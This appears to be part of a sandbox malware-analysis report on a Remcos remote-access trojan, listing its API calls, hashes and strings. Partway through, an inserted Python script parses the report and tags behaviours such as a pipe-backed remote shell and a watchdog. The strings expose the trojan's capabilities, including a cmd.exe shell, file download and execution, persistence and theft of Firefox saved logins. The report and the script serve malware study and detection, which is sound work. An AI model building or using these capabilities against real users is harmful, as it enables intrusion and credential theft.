                                        • GetLocalTime.KERNEL32(?), ref: 04A84F61
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04A84FAD
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 04A84FC0
                                        Strings
                                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 04A84F74
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: Connection KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-507513762
                                        • Opcode ID: b97bf0218d323b5cde1b9eca8a8a16ff645312b732fe03feb4043e49d4b5a447
                                        • Instruction ID: 71c688129f77b23438d297fbdcec3759d04adb4101ca8df85ce333bc29329d1d
                                        • Opcode Fuzzy Hash: b97bf0218d323b5cde1b9eca8a8a16ff645312b732fe03feb4043e49d4b5a447
                                        • Instruction Fuzzy Hash: 9B11A7319042847FEB20BB76980DAAB7FFCDBD6B14F04054DE85546281E6B4B845CBB1

                                        Control-flow Graph

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04A9216E
                                        • RegSetValueExA.KERNEL32(?,04AE4150,00000000,?,00000000,00000000,04AF2200,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A92196
                                        • RegCloseKey.ADVAPI32(?,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A921A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 9f0207034069cdb57eab0b6f60694647075e6f9393defa41a8c469727d568539
                                        • Instruction ID: 17b3dea51f16344f79da682efb09bf5d2ec35b4b203a9fb6ac8833a5393fcd22
                                        • Opcode Fuzzy Hash: 9f0207034069cdb57eab0b6f60694647075e6f9393defa41a8c469727d568539
                                        • Instruction Fuzzy Hash: 73F09632541108BFEF00AFA0DD44EEE777CEF04650F108655FD0A96150E731AE14DB90

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04A91F54
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,04AF2200), ref: 04A91F72
                                        • RegCloseKey.KERNEL32(?), ref: 04A91F7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseOpenQueryValue
                                        • String ID: pth_unenc
                                        • API String ID: 3677997916-4028850238
                                        • Opcode ID: 635b02e401191619497cdeeb503f06f3ce00b62b3084a40f059e1c4901d2226e
                                        • Instruction ID: 9118f2355e173a3a274918b9d3314cc08e5cbcc8d661905dd70930998b1ae9be
                                        • Opcode Fuzzy Hash: 635b02e401191619497cdeeb503f06f3ce00b62b3084a40f059e1c4901d2226e
                                        • Instruction Fuzzy Hash: D6F01D7690020CBFEF109FE09C45FED7BBCEB04710F1081A5BA05E6140E2355E149B90

                                        Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)
                                        • 1235: 4a91f91-4a91fbd RegOpenKeyExA -> 1236, 1237
                                        • 1236: 4a91fbf-4a91fe7 RegQueryValueExA RegCloseKey -> 1238, 1239
                                        • 1237: 4a91ff2 -> 1239
                                        • 1238: 4a91fe9-4a91ff0 -> 1240
                                        • 1239: 4a91ff4 -> 1240
                                        • 1240: 4a91ff9-4a92005 call 4a82073
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                        • RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 625506e59b1db3cbd24cfe9514ff826621b03aa7103028bbc1151ce7dba3c94d
                                        • Instruction ID: ada4af2b62df03b02c8940ed904c209a03718fe1f4080b9d405a2f8408f8d493
                                        • Opcode Fuzzy Hash: 625506e59b1db3cbd24cfe9514ff826621b03aa7103028bbc1151ce7dba3c94d
                                        • Instruction Fuzzy Hash: 6401A276A0112CBBEF209E95DD08DEE7BBDDB84250F004096BA05A2200DB71AE06DBA0

                                        Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)
                                        • 1250: 4ac3697-4ac36a2 -> 1251, 1252
                                        • 1251: 4ac36af-4ac36b5 -> 1254, 1255
                                        • 1252: 4ac36a4-4ac36a7 call 4ac3649 -> 1256
                                        • 1254: 4ac36b7-4ac36be call 4ac3c92 -> 1268
                                        • 1255: 4ac36c0-4ac36c3 -> 1258, 1259
                                        • 1256: 4ac36ac-4ac36ad -> 1261
                                        • 1258: 4ac36ea-4ac36fc HeapReAlloc -> 1262, 1263
                                        • 1259: 4ac36c5-4ac36ca call 4abad91 -> 1268
                                        • 1261: 4ac36d3-4ac36d5
                                        • 1262: 4ac36fe -> 1267
                                        • 1263: 4ac36d6-4ac36dd call 4ac2a57 -> 1259, 1270
                                        • 1267: 4ac36d2 -> 1261
                                        • 1268: 4ac36d0 -> 1267
                                        • 1270: 4ac36df-4ac36e8 call 4ac0480 -> 1258, 1259
                                        APIs
                                        • _free.LIBCMT ref: 04AC36B8
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • HeapReAlloc.KERNEL32(00000000,?,00000001,00000000,00000001,?,04A90639,?,?,04A90955), ref: 04AC36F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: b6bfe66a5c1f62732b3af70e0ddfb9fe6cfc0d440de4cf54ced3658e5918974b
                                        • Instruction ID: 65dd4014820fb07e9348e72909b12cd47db37c93f54f66aea33e8c6cb0da3ad9
                                        • Opcode Fuzzy Hash: b6bfe66a5c1f62732b3af70e0ddfb9fe6cfc0d440de4cf54ced3658e5918974b
                                        • Instruction Fuzzy Hash: DBF062327052156ADFA12B26AD04B6B37689F81A75B11C11EFC55AE390EE20F40157A5
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 04A84832
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,04A852EB,?,?,?,00000000,04A8BE60,?,?,?,?,04A8520E), ref: 04A8486E
                                          • Part of subcall function 04A8487E: WSAStartup.WS2_32(00000202,00000000), ref: 04A84893
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: 7d954cf92dfa467154a3333f2c1987c1c8ecedd528a96f24ed0aff8236eab6a2
                                        • Instruction ID: d21ddb76f83625baf1835b9b94dee9cb04b4b9041197b7035d465289f4c31a7d
                                        • Opcode Fuzzy Hash: 7d954cf92dfa467154a3333f2c1987c1c8ecedd528a96f24ed0aff8236eab6a2
                                        • Instruction Fuzzy Hash: 8E017C71808B909FD7359F29B444696BFE0EB29304F04495EF0D69BB91D3B5A846CB50
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,04AEFACC,04AF1FFC,00000000,04A93BDE,00000000,00000001), ref: 04A93961
                                        • WSASetLastError.WS2_32(00000000), ref: 04A93966
                                          • Part of subcall function 04A937DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04A9382B
                                          • Part of subcall function 04A937DC: LoadLibraryA.KERNEL32(?), ref: 04A9386D
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A9388D
                                          • Part of subcall function 04A937DC: FreeLibrary.KERNEL32(00000000), ref: 04A93894
                                          • Part of subcall function 04A937DC: LoadLibraryA.KERNEL32(?), ref: 04A938CC
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A938DE
                                          • Part of subcall function 04A937DC: FreeLibrary.KERNEL32(00000000), ref: 04A938E5
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,?), ref: 04A938F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: f6d4d77564db57868111559437591e72a87ad3a48facbbfd29ecea571b605f65
                                        • Instruction ID: 9c190c1af7763f824e4ff826605c6deeecc9eaf6531151144a1cd7473677e878
                                        • Opcode Fuzzy Hash: f6d4d77564db57868111559437591e72a87ad3a48facbbfd29ecea571b605f65
                                        • Instruction Fuzzy Hash: 38D012763011617B9B10B69E9D00B7666ECEBA5660B050066BC15D7500D6555C0247A0
                                        APIs
                                        • _wcslen.LIBCMT ref: 04A88F39
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A89305,?,00000000,00000000), ref: 04A8928B
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A892EF,?,00000000,00000000), ref: 04A8929B
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A89311,?,00000000,00000000), ref: 04A892A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CreateThread$_wcslen
                                        • String ID:
                                        • API String ID: 1119755333-0
                                        • Opcode ID: 2af8053e4439ad269cdc2fed73c8c04e1efe44e8eb88fcc1499828492a029ebd
                                        • Instruction ID: bbf3e2551773671ed9c2acb5d2495635c3e9159113590815f6ae669a4bc74f04
                                        • Opcode Fuzzy Hash: 2af8053e4439ad269cdc2fed73c8c04e1efe44e8eb88fcc1499828492a029ebd
                                        • Instruction Fuzzy Hash: 2821AD729040499BEB09FFE4EA119FE7BB9EF50214F40005DE912662C1EF25BE5ACB91
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: d744d6674a9835af9d4820b3837d1069bc12c34ed3f307ce593c18496db712cc
                                        • Instruction ID: b9cc57bb7cda27b3de8e291c0902a3ee8fb3763e5dc33378ee48ed6c728fedbc
                                        • Opcode Fuzzy Hash: d744d6674a9835af9d4820b3837d1069bc12c34ed3f307ce593c18496db712cc
                                        • Instruction Fuzzy Hash: C4E0E531201220AAEFA127625C0076B768CDB423A0F06C22CEC45DA280DF61F80043E5
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 04A84893
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: c84b5c24b6212ff629b4aacd7c253bb215a691256256327dd7903b46fd973190
                                        • Instruction ID: 1dcee0b9d0275117cd54f980c6a20db2f6739388ed4a989b7994fd05d06cf159
                                        • Opcode Fuzzy Hash: c84b5c24b6212ff629b4aacd7c253bb215a691256256327dd7903b46fd973190
                                        • Instruction Fuzzy Hash: B6D012725596085ED610AAB5A90F8A5775CC322A51F4003AB6CB6875C3E6442B1DC3A7
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 822a38140577c798c5e4fe56cb256e4d70ed4824263688be5be56027bf8715b4
                                        • Instruction ID: 3e86cf3f4a887aa005725903545b53f45e9cb0252c275a117de1a2548d0527e9
                                        • Opcode Fuzzy Hash: 822a38140577c798c5e4fe56cb256e4d70ed4824263688be5be56027bf8715b4
                                        • Instruction Fuzzy Hash: 2DB092FA208202BF8A061B60C80487A7EB6EBC8780B00881CF14740120D6769860AB22
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 04A86D4A
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 04A86E18
                                        • DeleteFileW.KERNEL32(00000000), ref: 04A86E3A
                                          • Part of subcall function 04A9A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A076
                                          • Part of subcall function 04A9A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0A6
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0FB
                                          • Part of subcall function 04A9A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A15C
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A163
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                          • Part of subcall function 04A84A81: WaitForSingleObject.KERNEL32(?,00000000,04A845C6,?,?,00000004,?,?,00000004,04A8BE60,00000000,?), ref: 04A84B27
                                          • Part of subcall function 04A84A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,04A8BE60,00000000,?,?,?,?,?,?,04A845C6), ref: 04A84B55
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04A87228
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 04A87309
                                        • DeleteFileA.KERNEL32(?), ref: 04A8768E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                        • API String ID: 1385304114-1507758755
                                        • Opcode ID: bd171619cded84bdf5faed46547f98ce8f01f2a03d6b21df5515e4845f72bab6
                                        • Instruction ID: 7124c874a10994d2f768c839f755b17da0e4437c476ae3cdc959d99b0f3846cb
                                        • Opcode Fuzzy Hash: bd171619cded84bdf5faed46547f98ce8f01f2a03d6b21df5515e4845f72bab6
                                        • Instruction Fuzzy Hash: DC427172A043046BFA18FB74CE659BE77A9EF91208F40091DF582571D1FE25BE0AC792
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 04A856C6
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • __Init_thread_footer.LIBCMT ref: 04A85703
                                        • CreatePipe.KERNEL32(04AF3BB4,04AF3B9C,04AF3AC0,00000000,04AE3068,00000000), ref: 04A85796
                                        • CreatePipe.KERNEL32(04AF3BA0,04AF3BBC,04AF3AC0,00000000), ref: 04A857AC
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,04AF3AD0,04AF3BA4), ref: 04A8581F
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 04A85877
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A8589C
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 04A858C9
                                          • Part of subcall function 04AB2525: __onexit.LIBCMT ref: 04AB252B
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,04AF1F28,04AE306C,00000062,04AE3050), ref: 04A859C4
                                        • Sleep.KERNEL32(00000064,00000062,04AE3050), ref: 04A859DE
                                        • TerminateProcess.KERNEL32(00000000), ref: 04A859F7
                                        • CloseHandle.KERNEL32 ref: 04A85A03
                                        • CloseHandle.KERNEL32 ref: 04A85A0B
                                        • CloseHandle.KERNEL32 ref: 04A85A1D
                                        • CloseHandle.KERNEL32 ref: 04A85A25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: SystemDrive$cmd.exe
                                        • API String ID: 2994406822-3633465311
                                        • Opcode ID: 9dc11bf39052f30d52db135ed2d5382c339bb7d9e39e7e9d517b85ce13748cf4
                                        • Instruction ID: f1c9d9c8be49086b0da658a17e2e71725cc59a9ae6dc0ffb4f6ef05804e3c654
                                        • Opcode Fuzzy Hash: 9dc11bf39052f30d52db135ed2d5382c339bb7d9e39e7e9d517b85ce13748cf4
                                        • Instruction Fuzzy Hash: 1891F971A11204BFFF04FFA5AD64D6E7BADFB64248F40042DFD469B281DA25BC058B61
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 04A90B6B
                                          • Part of subcall function 04A92268: RegCreateKeyA.ADVAPI32(80000001,00000000,04AE3050), ref: 04A92276
                                          • Part of subcall function 04A92268: RegSetValueExA.ADVAPI32(04AE3050,000000AF,00000000,00000004,00000001,00000004,?,?,?,04A8B093,04AE38E0,00000001,000000AF,04AE3050), ref: 04A92291
                                          • Part of subcall function 04A92268: RegCloseKey.ADVAPI32(04AE3050,?,?,?,04A8B093,04AE38E0,00000001,000000AF,04AE3050), ref: 04A9229C
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04A90BAB
                                        • CloseHandle.KERNEL32(00000000), ref: 04A90BBA
                                        • CreateThread.KERNEL32(00000000,00000000,04A91253,00000000,00000000,00000000), ref: 04A90C10
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 04A90E7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                        • API String ID: 3018269243-13974260
                                        • Opcode ID: 039d3506c871f7b204437c1256075ceb70faeaab04d406b279ed1bb159db2679
                                        • Instruction ID: 9cd41854f8ce017363c10cc2c7b97bde7a3e8bbd0c21c7dfabbf922362c6a399
                                        • Opcode Fuzzy Hash: 039d3506c871f7b204437c1256075ceb70faeaab04d406b279ed1bb159db2679
                                        • Instruction Fuzzy Hash: C971C6726083016BFA08FB71CE55DBF77E8EFA1208F40092DF45256191EF64BE0AC692
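The API traces above (the RegOpenKeyExA/RegQueryValueExA readers, the socket/WSAStartup function, the CreatePipe/CreateProcessA cmd.exe function and the watchdog function) print every argument as raw hex. The Python below is an added example, not code from the Joe Sandbox report, from Joe Security or from Remcos: it parses the report's "api.MODULE(args), ref: addr" lines, decodes the well-known Win32 constants in them using their documented values (0x80000001 HKEY_CURRENT_USER, 0x20019 KEY_READ, 0x1FFFFF PROCESS_ALL_ACCESS, 0x100000 SYNCHRONIZE, 0x202 WinSock 2.2) and applies a few pattern rules of its own. The regular expression, the argument positions relied on and the tag vocabulary are assumptions made here; the sample lines are copied from the function blocks above.

```python
"""Added example, not code from the Joe Sandbox report or from Remcos: parse the
report's "<api>.<module>(<args>), ref: <addr>" lines, decode well-known Win32
constants the report leaves as bare hex, and tag behaviours (tag names are ours)."""
from __future__ import annotations
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")  # the report prints stack words as 8 hex digits

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                    # call-site address
    subcall: int | None = None  # callee address on "Part of subcall function" lines

def parse_line(line: str) -> ApiCall | None:
    m = LINE_RE.match(line)
    if not m:
        return None
    return ApiCall(m["api"], m["mod"], m["args"].split(",") if m["args"] else [],
                   int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None)

def parse_block(text: str) -> list[ApiCall]:
    return [c for c in map(parse_line, text.splitlines()) if c]

HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
DECODERS = {  # (api, argument index) -> symbolic name, or None when the value is not known
    ("RegOpenKeyExA", 0): HKEY.get,
    ("RegOpenKeyExA", 3): lambda v: "KEY_READ" if v == 0x20019 else None,
    ("RegSetValueExA", 3): {1: "REG_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}.get,
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}.get,
    ("socket", 2): {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}.get,
    ("WSAStartup", 0): lambda v: f"WinSock {v & 0xFF}.{v >> 8}",  # MAKEWORD(major, minor)
    ("OpenProcess", 0): lambda v: "PROCESS_ALL_ACCESS" if v == 0x1FFFFF else None,
    ("CreateProcessA", 4): lambda v: "bInheritHandles=" + ("TRUE" if v else "FALSE"),
}

def decode_args(call: ApiCall) -> list[str]:
    out = []
    for i, raw in enumerate(call.args):
        if not HEX8.fullmatch(raw):  # "?" (unresolved) or an inline string such as "open"
            out.append(raw)
            continue
        v, dec = int(raw, 16), DECODERS.get((call.api, i))
        name = dec(v) if dec else None
        out.append(f"{name} (0x{v:X})" if name else f"0x{v:X}")
    return out

def _arg(calls: list[ApiCall], api: str, idx: int) -> int | None:
    for c in calls:  # argument idx of the first call to api, if the report resolved it
        if c.api == api and idx < len(c.args) and HEX8.fullmatch(c.args[idx]):
            return int(c.args[idx], 16)
    return None

def tag_behaviours(calls: list[ApiCall]) -> set[str]:
    names = [c.api for c in calls]
    tags: set[str] = set()
    if "RegOpenKeyExA" in names and "RegQueryValueExA" in names:
        tags.add("registry-read:" + HKEY.get(_arg(calls, "RegOpenKeyExA", 0), "unknown-root"))
    if "RegSetValueExA" in names and _arg(calls, "RegCreateKeyA", 0) == 0x80000001:
        tags.add("registry-write:HKCU")
    if _arg(calls, "socket", 1) == 1 and _arg(calls, "socket", 2) == 6:
        tags.add("tcp-socket")
    # two pipes, CreateProcess with inheritable handles, then a peek/read/write loop
    if (names.count("CreatePipe") >= 2 and _arg(calls, "CreateProcessA", 4) == 1
            and {"PeekNamedPipe", "ReadFile", "WriteFile"} <= set(names)):
        tags.add("pipe-backed-shell")
    if {"OpenMutexA", "CreateThread"} <= set(names) and _arg(calls, "OpenProcess", 0) == 0x1FFFFF:
        tags.add("process-watchdog")
    return tags

# Sample input: lines copied from the report, one function per block.
REGISTRY_FN = """• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04A91F54
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,04AF2200), ref: 04A91F72
"""
SHELL_FN = """• CreatePipe.KERNEL32(04AF3BB4,04AF3B9C,04AF3AC0,00000000,04AE3068,00000000), ref: 04A85796
• CreatePipe.KERNEL32(04AF3BA0,04AF3BBC,04AF3AC0,00000000), ref: 04A857AC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,04AF3AD0,04AF3BA4), ref: 04A8581F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A8589C
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 04A858C9
• WriteFile.KERNEL32(00000000,00000000,?,00000000,04AF1F28,04AE306C,00000062,04AE3050), ref: 04A859C4
• CloseHandle.KERNEL32 ref: 04A85A03
"""
WATCHDOG_FN = """  • Part of subcall function 04A92268: RegCreateKeyA.ADVAPI32(80000001,00000000,04AE3050), ref: 04A92276
  • Part of subcall function 04A92268: RegSetValueExA.ADVAPI32(04AE3050,000000AF,00000000,00000004,00000001,00000004,?), ref: 04A92291
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04A90BAB
• CreateThread.KERNEL32(00000000,00000000,04A91253,00000000,00000000,00000000), ref: 04A90C10
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 04A90E7F
"""

if __name__ == "__main__":
    calls = parse_block(SHELL_FN)
    print(sorted(tag_behaviours(calls)), [decode_args(c) for c in calls])
```

Two caveats when reading the output. Joe Sandbox prints extra stack words after an API's real parameters (CreatePipe is shown with six arguments although it takes four), so index-based decoding is only trustworthy for the leading parameters, and unresolved values stay as "?". And the getaddrinfo function above, which loads a DLL from the system directory, resolves getaddrinfo with GetProcAddress, frees it and retries with a second DLL, matches the load sequence of the Visual C++ wspiapi.h getaddrinfo compatibility shim, so on its own it is weak evidence of deliberate import hiding.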
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 04A8AAF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AB0A
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 04A8AC2D
                                        • FindClose.KERNEL32(00000000), ref: 04A8AC53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: 75ef2b917be17a7087d710d43eaea8378eba315f1c26d7d274f1754f081509c9
                                        • Instruction ID: 5dbb4cc47aaa5c8408cb1669b5d58994116490a1bec2447aa82231c52ed01db6
                                        • Opcode Fuzzy Hash: 75ef2b917be17a7087d710d43eaea8378eba315f1c26d7d274f1754f081509c9
                                        • Instruction Fuzzy Hash: 60513971900119ABEB14FBB0DE95AEEB778FF60208F40065EE416A60D1FF747E46CA91
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 04A8ACF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AD0A
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 04A8ADCA
                                        • FindClose.KERNEL32(00000000), ref: 04A8ADF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AE11
                                        Strings
                                        Memory Dump Source
